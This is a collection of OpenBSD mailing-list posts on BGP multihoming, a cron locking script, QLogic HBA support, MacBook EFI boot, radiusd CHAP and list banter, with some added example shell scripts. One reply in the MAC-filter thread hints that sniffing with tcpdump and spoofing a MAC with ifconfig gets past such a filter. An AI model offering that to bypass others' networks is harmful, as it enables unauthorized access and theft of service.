> ARIN says you can get a /22 for multihoming if you can justify their 25% / 50% usage as spelled out in their numbering policy. https://www.arin.net/policy/nrpm.html#four322
>
> If you can't justify that, then get a /24 of PA space from a provider that *will* allow you to reannounce that /24 via an additional transit and *will* provide you with an LOA that you can provide to that additional transit operator. The number of networks that filter prefixes smaller than /22 don't appear to be that numerous IMHO, but if they do, your /24 will still be reachable as they'll see the larger /19 or whatever from your provider that it's carved out of.
>
>> I am under the impression this is not reason enough for ARIN, that they are in a rationing mood when it comes to handing out IPv4 address blocks.
>
> As well they should be. IP resources are scarce and people are wasteful and greedy. Most offices don't need BGP multihoming, or any sort of inbound multihoming at all-- just outbound which is easily done without the assistance of the ISPs themselves or ARIN by using NAT and upstream-failover features commonly found in most routers.
>
> Most world-accessible servers that are important enough to need inbound multihoming should be sitting in a datacenter which has significantly more professionally-managed multihoming than small offices. And before the flaming starts, remember that I said "most."
>
> Cheers,
> Tico
>
>> Karl
>> Free Software: "You don't pay back, you pay forward." -- Robert A. Heinlein
Re: BGP and NATting to multiple ISPs
On 19 June 2009, at 00:10, Henning Brauer wrote:
> * Pete Vickers [2009-06-19 00:02]:
>> Actually, the sooner the IPv4 space gets used up the better, then everyone will have to migrate to IPvShit, and be done with it.
>
> that doesn't solve a single problem. in return, you get a plethora of new ones on top.
>
> --
> Henning Brauer, h...@bsws.de, henn...@openbsd.org
> BS Web Services, http://bsws.de
> Full-Service ISP - Secure Hosting, Mail and DNS Services
> Dedicated Servers, Rootservers, Application Hosting - Hamburg & Amsterdam

Once 'everyone' is solely 'on' v6, then v4 space is not a concern. As lots of folks (and I'm one of them) here point out v6 has many many issues, but premature v4 exhaustion / v6 migration would force these issues to be resolved a lot quicker.

/Pete
Re: BGP and NATting to multiple ISPs
On 19 June 2009, at 00:40, Ted Unangst wrote:
> On Thu, Jun 18, 2009 at 5:54 PM, Pete Vickers wrote:
>> nah, you may be right technically with the data-center argument, but not politically. Everyone has the 'right' to proper redundancy for H/A if they want/need it. Actually, the sooner the IPv4 space gets used up the better, then everyone will have to migrate to IPvShit, and be done with it.
>
> oh really? people are going to start carrying /48s in a world where they don't even carry anything more than a /24 for ipv4?

admins who filter >= /24 and don't set a default to upstream [1] generally get what they deserve - since they are blackholing potential customers. If their employer is so cash strapped they can't afford the ASIC space for a full table, then presumably their market share & b/w usage are such that they can hold the table in software instead. (dumb north american routing policies excepted)

[1] Or 0.0.0.0/1 and 128.0.0.0/1 across links, or somesuch.

/Pete
sole instance of a process
Hi,

I suspect this may be the wrong list for this question. However although strictly it's a Bourne shell script query, it only seems to act up under OpenBSD (for me).

Essentially I have a job which needs to be run periodically. So I have a shell script to do the necessary commands, and this is scheduled via (root's) crontab. It is however very important that multiple instances of the job are not run concurrently (e.g. if a previous invocation hung), and so the script should detect this upon invocation before proceeding. I don't want a single long running job (which could e.g. sleep between loops) for various reasons. And I also don't like PID files and other fragile locking hacks.

So down to business, below is the gist of my script. Most of the time it appears to run fine. However occasionally (once every couple of days?) it reports via email that a duplicate process is detected, but the included ps listing shows no other instance. I don't believe that this is just due to an old instance exiting in the small time window between the pgrep, and the ps invocations. So basically I guess there is an error in my script or its logic, or something else I'm not seeing. Any hit with the clue bat gratefully received.

#!/bin/sh
#
#
SHOUT="/usr/bin/logger -i -t MYPERIODICJOB"
#
#
# Ensure another instance of this is not running
#
MYNAME=`basename $0`
MYPID=$$
#
/usr/bin/pgrep -fu root $MYNAME | /usr/bin/grep -v $MYPID && \
  { $SHOUT "HELP - duplicate process detected $?" ; \
    ps -axjwww | mail -s "HELP MYPERIODICJOB $MYPID $MYNAME $PPID" m...@example.com ; \
    exit 1 ; }
#
#
# starting doing useful stuff here..
#

Disclaimer: I know my scripting is far from optimal...

/Pete
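A single-instance guard that does not rely on reading the process table, added here as an illustration; it is not the poster's script and not part of OpenBSD base. Matching pgrep/ps output depends on what else happens to carry the script name in its argument list (a wrapper shell, an editor, a second copy of the check itself) and on the window between the two commands. An atomic filesystem operation avoids both problems: symlink creation either succeeds or fails as one step, and the link target records the owner's PID, so there is no gap between "take the lock" and "record who holds it". The lock path, the job name and the stale PID used in the demo are assumed values.

```shell
#!/bin/sh
# Added example: single-instance guard for a cron-run script using an
# atomic symlink as the lock. Not from the original post. Lock path and
# job name below are assumed values.

# acquire_lock LOCK PID
# Returns 0 if LOCK now belongs to PID, 1 if another live process holds it.
acquire_lock() {
    al_lock=$1 al_pid=$2
    # Fast path: ln -s is atomic. If the name already exists it fails
    # without touching the existing link, so two callers cannot both win.
    if ln -s "$al_pid" "$al_lock" 2>/dev/null; then
        return 0
    fi
    # Slow path: the lock exists. Is the recorded owner still alive?
    # kill -0 sends no signal; it only checks that the PID exists.
    # (Root sees no EPERM; unprivileged callers should treat EPERM as alive.)
    al_holder=$(readlink "$al_lock" 2>/dev/null || true)
    if [ -n "$al_holder" ] && kill -0 "$al_holder" 2>/dev/null; then
        return 1
    fi
    # Stale lock: the holder died without cleaning up. Remove it and retry
    # once. Two reapers of the same stale lock can still race in this
    # small window; for a job started once a minute that is acceptable,
    # and the loser simply backs off until the next cron run.
    rm -f "$al_lock"
    ln -s "$al_pid" "$al_lock" 2>/dev/null
}

# release_lock LOCK PID: only the recorded owner removes the lock, so a
# late-exiting instance cannot delete a lock that now belongs to another.
release_lock() {
    [ "$(readlink "$1" 2>/dev/null || true)" = "$2" ] && rm -f "$1"
}

# Typical use from the top of a periodic script (run with --demo to see it).
if [ "${1:-}" = "--demo" ]; then
    LOCK="${TMPDIR:-/tmp}/myperiodicjob.lock"     # assumed lock path
    if ! acquire_lock "$LOCK" "$$"; then
        logger -i -t MYPERIODICJOB "another instance holds $LOCK (pid $(readlink "$LOCK"))"
        exit 1
    fi
    trap 'release_lock "$LOCK" "$$"' EXIT INT TERM
    echo "lock $LOCK held by $$; doing the periodic work..."
fi
```

The `trap` releases the lock on normal exit and on SIGINT/SIGTERM; a SIGKILL or a crash leaves the link behind, which is exactly the case the stale-lock path in `acquire_lock` handles on the next run.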
'newer' Qlogic HBA support on amd64
Hi,

I have an amd64 server (HP DL360 G5), with a Qlogic FC HBA in it. It appears to be based on the ISP2400 series, and the isp man page says the driver only supports up to the ISP2300 series. However the driver appears to try to attach the device irrespective (and fail). Does anyone know how different the 2400 series are, or if there is work in progress to support them ?

thanks
/Pete

Some relevant info below:

$ dmesg | grep isp0
isp0 at pci8 dev 0 function 0 "QLogic ISP2432" rev 0x02: apic 8 int 17
isp0: Polled Mailbox Command (0x8) Timeout (10us)
isp0: Polled Mailbox Command (0x8) Timeout (10us)
isp0: Mailbox Command 'ABOUT FIRMWARE' failed (TIMEOUT)

# pcidump -v 19:0:0
 19:0:0: QLogic ISP2432
        0x: Vendor ID: 1077 Product ID: 2432
        0x0004: Command: 0147 Status ID: 0010
        0x0008: Class: 0c Subclass: 04 Interface: 00 Revision: 02
        0x000c: BIST: 00 Header Type: 00 Latency Timer: 00 Cache Line Size: 10
        0x0010: BAR io addr: 0x5000/0x0100
        0x0014: BAR mem 64bit addr: 0xfdff/0x4000
        0x001c: BAR empty ()
        0x0020: BAR empty ()
        0x0024: BAR empty ()
        0x0028: Cardbus CIS:
        0x002c: Subsystem Vendor ID: 103c Product ID: 7040
        0x0030: Expansion ROM Base Address:
        0x0038:
        0x003c: Interrupt Pin: 01 Line: 07 Min Gnt: 00 Max Lat: 00
        0x0044: Capability 0x01: Power Management
        0x004c: Capability 0x10: PCI Express
                Link Speed: 2.5 / 2.5 GT/s
                Link Width: x4 / x4
        0x0064: Capability 0x05: Message Signaled Interrupts (MSI)
        0x0074: Capability 0x03: Vital Product Data (VPD)
        0x007c: Capability 0x11: Extended Message Signaled Interrupts (MSI-X)

$ dmesg | head
OpenBSD 5.3 (GENERIC.MP) #62: Tue Mar 12 18:21:20 MDT 2013
    dera...@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP

# sysctl hw
hw.machine=amd64
hw.model=Intel(R) Xeon(R) CPU E5420 @ 2.50GHz
hw.ncpu=4
hw.byteorder=1234
hw.pagesize=4096
hw.disknames=sd0:20008a7ae6c37c52,cd0:
hw.diskcount=2
hw.sensors.cpu0.temp0=37.00 degC
hw.sensors.cpu1.temp0=37.00 degC
hw.sensors.cpu2.temp0=37.00 degC
hw.sensors.cpu3.temp0=37.00 degC
hw.sensors.acpitz0.temp0=8.30 degC (zone temperature)
hw.sensors.ciss0.drive0=online (sd0), OK
hw.cpuspeed=2500
hw.setperf=100
hw.vendor=HP
hw.product=ProLiant DL360 G5
hw.physmem=4292161536
hw.usermem=4292136960
hw.ncpufound=4
hw.allowpowerdown=1
Re: 'newer' Qlogic HBA support on amd64
Hi,

Sorry for the delay. I finally upgraded the box (very quick and easy process - nice ) and the HBA is now attached by the qle driver. However whilst it 'sees' the SAN disk behind it, it remains unable to talk to it.

# uname -mrv
5.5 GENERIC.MP#315 amd64

# dmesg | egrep -i "qle|scsibus1"
qle0 at pci8 dev 0 function 0 "QLogic ISP2432" rev 0x02: msi
qle0: bad startup mboxes: 0 0
qle0: firmware rev 4.0.20, attrs 0x2
scsibus1 at qle0: 2048 targets, WWPN 50060b66644e, WWNN 50060b66644f
sd1 at scsibus1 targ 130 lun 0: SCSI2 0/direct fixed naa.600601601b662700d837603da8efe011
sd2 at scsibus1 targ 131 lun 0: SCSI2 0/direct fixed naa.600601601b662700d837603da8efe011

sd1 & sd2 : Are these duplicates due to redundant paths in SAN fabric ?

# fdisk sd1
fdisk: DIOCGPDINFO: Input/output error
fdisk: Can't get disk geometry, please use [-chs] to specify.

# pcidump -v 19:0:0
 19:0:0: QLogic ISP2432
        0x: Vendor ID: 1077 Product ID: 2432
        0x0004: Command: 0147 Status: 0010
        0x0008: Class: 0c Subclass: 04 Interface: 00 Revision: 02
        0x000c: BIST: 00 Header Type: 00 Latency Timer: 00 Cache Line Size: 10
        0x0010: BAR io addr: 0x5000/0x0100
        0x0014: BAR mem 64bit addr: 0xfdff/0x4000
        0x001c: BAR empty ()
        0x0020: BAR empty ()
        0x0024: BAR empty ()
        0x0028: Cardbus CIS:
        0x002c: Subsystem Vendor ID: 103c Product ID: 7040
        0x0030: Expansion ROM Base Address:
        0x0038:
        0x003c: Interrupt Pin: 01 Line: 07 Min Gnt: 00 Max Lat: 00
        0x0044: Capability 0x01: Power Management
        0x004c: Capability 0x10: PCI Express
                Link Speed: 2.5 / 2.5 GT/s
                Link Width: x4 / x4
        0x0064: Capability 0x05: Message Signaled Interrupts (MSI)
        0x0074: Capability 0x03: Vital Product Data (VPD)
        0x007c: Capability 0x11: Extended Message Signaled Interrupts (MSI-X)

e.g. http://filedownloads.qlogic.com/files/datasheets/32359/83432-580-00D.pdf

(let me know if you want list spam with full dmesg).

/Pete

On 13 March 2014, at 18:48, Ted Unangst wrote:
> On Thu, Mar 13, 2014 at 18:44, Pete Vickers wrote:
>> Hi,
>> I have an amd64 server (HP DL360 G5), with a Qlogic FC HBA in it. It
>> appears to be based on the ISP2400 series, and the isp man page says the
>> driver only supports up to the ISP2300 series. However the driver appears
>> to try to attach the device irrespective (and fail). Does anyone know how
>> different the 2400 series are, or if there is work in progress to support
>> them ?
>
> In 5.5 and later, that's supported by the qle driver. The isp driver
> is being broken into parts (qlw, qla, qle) depending on generation.
> I'd try a snapshot. It should work better. And if it doesn't work,
> we'd like to know.
External monitor issue with EFI & MacBook
Hello all,

I'm having issues installing OpenBSD 6.0 (-current) on my old Apple MacBook (Early 2008). The builtin screen is broken so I'm using a mini-DVI to VGA connector and external monitor to do the install. I'm under the impression that it's better to install / boot from EFI instead of the BIOS mode because the computer won't display the SATA controller in BIOS mode but will in EFI mode. I don't know if this is actually true or not but I remember something on undeadly.org about a dev's experience with a MacBook Air with a similar story.

Anyways, so I do the install as a BIOS boot and it works just fine. I did the GPT route and rebooted. Now if the laptop lid is open it boots just fine (but I need to boot the Mac with it closed so the external video starts) but if the lid is closed it will boot until this line:

efifb at mainbus0 not configured

and then the screen goes blank. I believe it's a hang too, I set up networking and was unable to ping it after it should have booted up. With the screen open however, it boots up just fine. I've included a full dmesg from a successful boot below.

I've tried enabling verbose mode in boot -c but it seems the graphics drivers don't initialize until after that (I just get a blank screen). With config -e I've tried to turn off a few features (efifb, uvideo, etc.) with no luck. My feeling is the graphics drivers don't see the attached external screen or there is a failure handing off between the EFI and the kernel but I'm not really sure.

Can someone try to recreate this issue? (Boot up an amd64 Mac with lid closed in EFI mode) Also, does anyone have a guess as to where the code might be that controls this? I want to take a look before I file a formal bug report.

Thanks,
Pete Zabagel

OpenBSD 6.0-current (GENERIC.MP) #2480: Wed Sep 21 11:18:24 MDT 2016
    dera...@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP
real mem = 2107633664 (2009MB)
avail mem = 2039320576 (1944MB)
mpath0 at root
scsibus0 at mpath0: 256 targets
mainbus0 at root
bios0 at mainbus0: SMBIOS rev. 2.4 @ 0x7eec3000 (41 entries)
bios0: vendor Apple Inc. version "MB41.88Z.00C1.B00.0802091535" date 02/09/08
bios0: Apple Inc. MacBook4,1
acpi0 at bios0: rev 2
acpi0: sleep states S0 S3 S4 S5
acpi0: tables DSDT FACP HPET APIC MCFG ASF! SBST ECDT SSDT SSDT SSDT SSDT
acpi0: wakeup devices ADP1(S3) LID0(S3) ARPT(S3) GIGE(S3) UHC1(S3) UHC2(S3) UHC3(S3) UHC4(S3) UHC5(S3) EHC1(S3) EHC2(S3) EC__(S3)
acpitimer0 at acpi0: 3579545 Hz, 24 bits
acpihpet0 at acpi0: 14318179 Hz
acpimadt0 at acpi0 addr 0xfee0: PC-AT compat
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz, 1197.21 MHz
cpu0: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CV,PAT,PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,DTES64,MWAIT,DS-CPL,VMX,EST,TM2,SSSE3,CX16,xTPR,PDCM,SSE4.1,NXE,LONG,LAHF,PERF,SENSOR
cpu0: 3MB 64b/line 8-way L2 cache
cpu0: smt 0, core 0, package 0
mtrr: Pentium Pro MTRR support, 8 var ranges, 88 fixed ranges
cpu0: apic clock running at 199MHz
cpu0: mwait min=64, max=64, C-substates=0.2.2.2.2.1.3, IBE
cpu1 at mainbus0: apid 1 (application processor)
cpu1: Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz, 1197.00 MHz
cpu1: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,DTES64,MWAIT,DS-CPL,VMX,EST,TM2,SSSE3,CX16,xTPR,PDCM,SSE4.1,NXE,LONG,LAHF,PERF,SENSOR
cpu1: 3MB 64b/line 8-way L2 cache
cpu1: smt 0, core 1, package 0
ioapic0 at mainbus0: apid 1 pa 0xfec0, version 20, 24 pins
acpimcfg0 at acpi0 addr 0xf000, bus 0-255
acpiec0 at acpi0
acpiprt0 at acpi0: bus 0 (PCI0)
acpiprt1 at acpi0: bus 2 (RP05)
acpiprt2 at acpi0: bus 3 (RP06)
acpiprt3 at acpi0: bus 4 (PCIB)
acpicpu0 at acpi0: !C3(100@57 mwait.3@0x31), !C2(500@1 mwait@0x10), C1(1000@1 mwait), PSS
acpicpu1 at acpi0: !C3(100@57 mwait.3@0x31), !C2(500@1 mwait@0x10), C1(1000@1 mwait), PSS
acpiac0 at acpi0: AC unit online
acpibtn0 at acpi0: LID0
"APP0002" at acpi0 not configured
acpibtn1 at acpi0: PWRB
acpibtn2 at acpi0: SLPB
"APP0001" at acpi0 not configured
"APP0003" at acpi0 not configured
"ACPI0002" at acpi0 not configured
acpibat0 at acpi0: BAT0 not present
acpivideo0 at acpi0: GFX0
cpu0: Enhanced SpeedStep 1197 MHz: speeds: 2400, 2200, 2000, 1800, 1600, 1400, 1200, 800 MHz
pci0 at mainbus0 bus 0
pchb0 at pci0 dev 0 function 0 "Intel GM965 Host" rev 0x03
inteldrm0 at pci0 dev 2 function 0 "Intel GM965 Video" rev 0x03
drm0 at inteldrm0
intagp0 at inteldrm0
agp0 at intagp0: aperture at 0x8000, size 0x1000
inteldrm0: msi
inteldrm0: 1280x800
wsdisplay0 at inteldrm0 mux 1: console (std, vt100 emulation)
wsdisplay0: screen 1-5 added (std, vt100 emulation)
"Intel GM965 Video" rev 0x03 at pci0 dev 2 function 1 not configured
uhci0 at pci0 dev 26 function 0
non-PAP in radiusd
Hello friends, I noticed in the radiusd.conf man page that the bsdauth module only supports PAP: "It only supports PAP, password based authentication." Is there a specific reason as to why CHAP isn't implemented? I am assuming it is due to time / interest constraints but perhaps the quality of CHAP is in question too -- I see in the RFC that MD5 is assigned a specific value, making me wonder if MD5 is the predominant algorithm of CHAP implementations in the wild and perhaps considered insecure by the community. On a side note, does anyone know which algorithms are used in CHAP besides MD5? Thanks, Pete
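As an added illustration (not code from radiusd or from the original post), here is the CHAP computation of RFC 1994 in shell: the response is MD5 over the one-octet identifier, the shared secret and the challenge, and the authenticator verifies it by recomputing the same digest. That recomputation needs the secret itself on the server side, which is the property that separates CHAP from password-style verification, where a backend only has to answer yes or no to a submitted password. The sample values (identifier 97, secret "b", challenge "c") are constructed so the digest is the well-known MD5 of "abc"; `md5_hex`, `chap_response` and `chap_verify` are names I chose.

```shell
#!/bin/sh
# Added example: CHAP (RFC 1994) response and verification in shell.
# Not from radiusd or the original post; names and sample values are
# constructed for illustration.

# md5_hex: hex digest of stdin. md5sum on Linux/coreutils, md5 -q on OpenBSD.
md5_hex() {
    if command -v md5sum >/dev/null 2>&1; then
        md5sum | cut -d' ' -f1
    else
        md5 -q
    fi
}

# chap_response ID SECRET CHALLENGE
#   ID        : CHAP identifier, decimal 0..255 (one octet on the wire)
#   SECRET    : shared secret, as text
#   CHALLENGE : challenge value, as text (real challenges are random bytes)
# Response = MD5( ID || SECRET || CHALLENGE ), with no separators.
chap_response() {
    id_oct=$(printf '%03o' "$1")
    {
        printf "\\${id_oct}"          # the single identifier octet
        printf '%s%s' "$2" "$3"       # secret, then challenge
    } | md5_hex
}

# chap_verify ID SECRET CHALLENGE RESPONSE
# The authenticator repeats the computation with its own copy of the
# secret and compares. Returns 0 on match, 1 otherwise.
chap_verify() {
    expected=$(chap_response "$1" "$2" "$3")
    [ "$expected" = "$4" ]
}

# Demo with constructed values: id 97 (0x61, 'a'), secret "b", challenge "c"
# hashes "abc", so the response is 900150983cd24fb0d6963f7d28e17f72.
if [ "${1:-}" = "--demo" ]; then
    r=$(chap_response 97 b c)
    echo "response: $r"
    chap_verify 97 b c "$r" && echo "verify with correct secret: ok"
    chap_verify 97 wrong c "$r" || echo "verify with wrong secret: rejected"
fi
```

The verifier side shows why a hashed password store is not enough for CHAP: `chap_verify` has to feed the cleartext secret into the digest, whereas PAP hands the server the password itself and lets any verification backend check it.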
Re: OpenBSD 6.1 Release
Since 6.1 will be the first release in our "twentieth year" I hope the foundation offers installation service where Theo shows up in a limousine wearing a tuxedo and installs 6.1 for the princely sum of $10,000. What do you say Theo?

-PZ

From: owner-m...@openbsd.org on behalf of tec...@protonmail.com
Sent: March 1, 2017 12:07:45 PM
To: Theo de Raadt; misc@openbsd.org
Subject: Re: OpenBSD 6.1 Release

I was counting from last release on Sept 1st, my apologies.

>> Wondering if anyone knows about the new release schedule? It has
>> always been 6 months of course, so I presumed today would be the
>> day. Probably just a little impatient and excited for this one.
>
> Releases are generally near start of May and November.
Re: OpenBSD 6.1 Release
Oh, and he needs to port it to my TAM* and stay for fancy hors d'oeuvres (beef jerky, pop tarts and whiskey). *http://guides.macrumors.com/Twentieth_Anniversary_Macintosh
Re: is it possible to speed up network to 1 Gb ?
> The more complex the protocol, the slower the transfer.
> 85 MB/sec sounds about right for ftp in my opinion, samba may need some
> performance tuning.

Yep, I would recommend when tuning Samba to not just throw a bunch of optimizations in there and expect it to work magically. It's better to test with just a few (or even 1) modification first and work from there. OpenBSD can be a little slower but the trade off for better security is worth it IMHO. If you're going between Linux and OpenBSD, NFS would also be an option (not without its own tuning difficulties at times).

Remember you can tune Samba but you can't tune-a-fish!

-PZ
Re: Why isn't OpenBSD in Google Summer of Code 2017?...
Would the devs consider compiling a list of specific improvements they'd like to see volunteer'd upon this summer? I'd love to help especially if it was a group effort/friendly competition.

From: owner-m...@openbsd.org on behalf of Bob Beck
Sent: April 2, 2017 10:16:21 PM
To: Luke Small
Cc: openbsd-misc
Subject: Re: Why isn't OpenBSD in Google Summer of Code 2017?...

We tried it for two years, it was too much effort on the part of the foundation organizers mentors to deal with the bureaucracy involved, and we didn't really see enough return in terms of new developers to the project, which, frankly being selfish on OpenBSD's part is the only reason for us to do it.

Both Ken Westerback and I organized our end of it and dealt with the google paperwork the two years we did it. Neither of us is willing to do it again, and while I won't directly speak for Ken, I would not support us spending effort on this when there are lots of other things to do.. It just doesn't have the benefit for OpenBSD, especially in light of the effort of the volunteers necessary to participate.

On Sun, Apr 2, 2017 at 8:54 AM, Luke Small wrote:
Re: Replace sendmail with qmail?
In case it's needed (which I doubt), I'll voice my VERY strong preference for sendmail instead of all these other pretenders.

/Pete

On 30 Nov 2007, at 10:25 AM, Matthew Dempsky wrote:
> On 11/30/07, Peter Hessler <[EMAIL PROTECTED]> wrote:
>> That being said, its really easy to install qmail yourself and have it replace the in-tree sendmail (see mailer.conf).
>
> Right, and maybe for a future OpenBSD release you could swap the placement of sendmail and qmail in that sentence. :-)
>
> To be clear, I suggested replacing sendmail with qmail because 1) it would further OpenBSD's efforts of eliminating unacceptably licensed code and 2) I'm familiar with qmail, so I can actually contribute patches. If there's a more suitable MTA, I'd be even happier to see it go in (as long as I can keep using qmail ;-).
Re: Embedding OpenBSD
step 1. get any old ipod on ebay
step 2. put a single mp3 tune on it
step 3. place it in a big box, with the play button located right under a coin sized slot

openbsd is great, but it's not the hammer for all nails...

/Pete

On 28 Dec 2007, at 3:34 AM, Nick Holland wrote:

> I've got a little project I'm working on here.
> It involves stuffing a computer in a donation box with a money detector, so every time someone tosses money in the box, it plays an MP3 file.
>
> (no, you can't make a living at this. At least, *I* can't)
>
> The first two of these I did were many years ago, and we used a 486 running a simple DOS app. Well, computers that run DOS well are gone, and trying to bring up a new program to play sound files on any of the modern sound chips would be (not) fun...and annoying the next time the hardware all changes again.
>
> So, for this generation, I'm using OpenBSD, mpg321, and a 1G CF flash device attached to a CF->IDE interface.
>
> However, this is the first time I've ever done an OpenBSD system that wasn't going to be attached to some kind of network for (hopefully) years at a time. In fact, hopefully, it will NEVER be attached to a network. And, while I got a 1G CF device, I could imagine doing something stupid and having it slowly fill the CF media and six months from now getting a call saying, "It died. Come fix it", and since it will be in another country and probably a ten hour drive away, I'd like to avoid that. :) Once this thing is deployed, I won't have access to it at all, so I'll have no ability to spot a potential problem or fix it.
>
> SO, to try to keep things quiet, I've disabled the daily, weekly, and monthly scripts, I've disabled sendmail in /etc/rc.conf.local. Before I ship it out, I'll move /var/log and /var/tmp to point to a mfs system, so hopefully, if something starts logging, a power cycle will dump everything. Only 60M is mounted RW, so it fsck's very quickly, and my app writes only to the MFS.
>
> What have I forgotten? Is there anything else I can do to avoid slapping my forehead and saying, "D'oh! Forgot to ..." before I ship it out fully detached? The good news is I'm pretty sure there is at least one OpenBSD developer near-by, but that's just all the more reason to make sure I don't screw it up, I'll never live it down. :)
>
> Nick.
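One way to answer the "what have I forgotten?" question before shipping, as an added example that is not part of the thread: a small sh script that lists the disk-backed filesystems still mounted read-write (the only places a runaway writer can fill the CF card) and builds the fstab entries that move /var/log and /var/tmp into memory. It assumes the usual mount(8) output format and the -s and -P options of mount_mfs(8); the sample mount output is constructed.

```shell
#!/bin/sh
# Added example, not from the thread. Helpers for a read-mostly OpenBSD
# appliance: find where a runaway writer could still fill the flash, and
# build the fstab lines that move volatile directories into memory.

# Constructed sample of mount(8) output from such a box (not a real dump).
SAMPLE_MOUNT='/dev/wd0a on / type ffs (local, read-only)
/dev/wd0d on /var type ffs (local, nodev, nosuid)
mfs:12345 on /var/log type mfs (asynchronous, local, nodev, nosuid, size=32768)
mfs:12346 on /var/tmp type mfs (asynchronous, local, nodev, nosuid, size=16384)
/dev/wd0e on /usr type ffs (local, nodev, read-only)'

# rw_disk_mounts MOUNT_OUTPUT
# Prints, one per line, the mount points that are writable AND disk-backed.
# mfs mounts are skipped: they live in RAM and a power cycle empties them.
# Fields of a mount(8) line: device "on" mountpoint "type" fstype (options)
rw_disk_mounts() {
    printf '%s\n' "$1" | awk '$0 !~ /read-only/ && $5 != "mfs" { print $3 }' | sort
}

# mfs_fstab_line MOUNTPOINT SECTORS [TEMPLATE_DIR]
# Emits an fstab(5) entry mounting MOUNTPOINT as an mfs of SECTORS 512-byte
# sectors (-s counts sectors, so 32768 is 16 MB). With a template directory,
# -P (assumed available on this release) pre-populates the mfs at mount time
# so files such as /var/log/messages exist again after every boot; syslogd
# only writes to log files that already exist.
mfs_fstab_line() {
    if [ -n "$3" ]; then
        printf 'swap %s mfs rw,nodev,nosuid,-s=%s,-P=%s 0 0\n' "$1" "$2" "$3"
    else
        printf 'swap %s mfs rw,nodev,nosuid,-s=%s 0 0\n' "$1" "$2"
    fi
}

# Stand-alone run: report what is still writable, then print fstab lines.
echo "writable disk-backed filesystems:"
rw_disk_mounts "$SAMPLE_MOUNT"
echo
echo "fstab entries for the memory-backed directories:"
mfs_fstab_line /var/log 32768 /var/log.template
mfs_fstab_line /var/tmp 16384
```

On a real box, feed `rw_disk_mounts "$(mount)"` instead of the sample; anything it lists besides the one small RW partition is a place where unbounded growth is still possible.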
Re: avoiding a mac address filter
Well this sounds very much to me like 'We know (for example) Windows security is weak by design, but it's not MS's fault for a crap system, it's the bad guys' fault for actually realising it'. I disagree, MS have no excuse for not providing sufficient/suitable security in their products, and may even have a legal obligation to do so.

Also, whilst I would never condone hacking (cracking), I believe in freedom of information, and even a potential security expert must begin his/her learning somewhere. It is common knowledge, and freely available on the Internet (http://www.openbsd.org/cgi-bin/man.cgi), that tcpdump may allow you to watch network traffic on a shared medium such as WLAN, and also that ifconfig may allow you to change the MAC address on your network card. Note that if your country interprets freedom in such a fashion that it would implicate me here, then this email is intended to improve the ability of a 'good guy', not encourage a 'bad guy'...

To put it another way, is it my fault for teaching you to drive a car, if you then use those skills to run down innocent pedestrians ?

/Pete

On 7 Jan 2008, at 8:28 PM, Andreas Maus wrote:

On Mon, Jan 07, 2008 at 12:19:26PM -0500, Dave Anderson wrote:

On Mon, 7 Jan 2008, Pau Amaro-Seoane wrote:

loosen up a bit, you're too tight up... I just want to check my emails, I don't want to download p0nr movies

Theft of service is theft, regardless of how much or little service you're stealing. If someone's gone to the trouble of filtering on MAC addresses, they've clearly indicated that they're not a public service -- and no amount of weasel-wording will get around that.

ACK!

Furthermore, depending on your origin this is considered a criminal act if you circumvent the MAC filter. E.g. here in Germany you will pay for that crime or go to jail (for up to 5 years) for doing this for:
a: sniffing the traffic to get a valid IP/MAC association
b: breaking into the system which is protected (even a MAC filter is considered a protection).

And NO, A SYSTEM THAT USES MAC FILTERING IS NOT AN OPEN ACCESSPOINT!

Oh and by the way it may be considered a crime trying to do this or giving you tips on how to do this (incitement).

If you have a similar system at work and you try to figure out how bad guys may attack this ... well, talk to your boss or your IT security team. Maybe you will be assigned to a penetration test. But in this case you have to sign an agreement on what you should do, what you shouldn't do and when and how to do such tests. (and if you are in a position to do penetration tests you wouldn't ask such questions ;) )

So don't expect any answer on this list.

Andreas.

--
Windows 95: A 32-bit patch for a 16-bit GUI shell running on top of an 8-bit operating system written for a 4-bit processor by a 2-bit company who cannot stand 1 bit of competition.
Re: BSD Port from OpenJDK
Hi,

Whilst I fully acknowledge the stigma that goes with java, I'm very grateful to Kurt et al. for making it run under OpenBSD. It has saved me from having to admin extra linux/solaris boxes many times, when customers insist on java. I'm also looking forward to merely pkg_add'ing it instead of playing "hunt the patch after license clicking" as was previously necessary.

Nice work ! Appreciated.

/Pete

On 15 Oct 2008, at 02:06, Kurt Miller wrote:

On Tuesday 14 October 2008 11:13:41 am new_guy wrote:

Ben Adams-3 wrote:

Just wondering if this will affect OpenBSD with java: Per the interim governance guidelines for Projects [1] I'm pleased to announce the creation of the BSD Port Project

Java is nasty. There... I said it and it is true. The goopy OOP of Java will tarnish anything it touches. Personally, I hope Java (in all of its virtual glory) never makes it into OpenBSD at all. Real men will cry man tears when OpenBSD ships with Java.

Uninformed. We've had Java for years and now we have packages: ftp://ftp.openbsd.org/pub/OpenBSD/snapshots/packages/i386/jdk-1.7.0.00b24p2.tgz 4.4 will have packages also.

Your negativity sucks. Porting Java to OpenBSD was and is not a trivial effort. It also serves as an excellent test bed for threads, the runtime linker and large memory applications. Porting Java to OpenBSD enabled the LOCKSS project to use it for its noble goals. It uncovered deadlocks in our pthread lib that resulted in large improvements to libpthread. Its use of dlopen() and friends resulted in significant improvements in our runtime linker. Oh and who made those improvements??? The same person who took the time to port Java to OpenBSD!! Me and other OpenBSD developers who saw the need to improve things. BTW, all those system level improvements have made significant stability gains for applications like firefox, KDE, OpenOffice, Asterisk, etc, etc which all use threads and dlopen() a lot.

Quite frankly I'm pretty upset at all the 'Java sucks' banter on misc. If you and the other naysayers don't realize that porting Java to OpenBSD was a 'Good-Thing' then you are just UNINFORMED!

-Kurt
Re: Longest Uptime?
Okai, here's my $0.02 on the subject: http://systemnet.no/ios-uptime.jpg

/Pete

On 29 Oct 2008, at 18:49, guilherme m. schroeder wrote:

Hi,

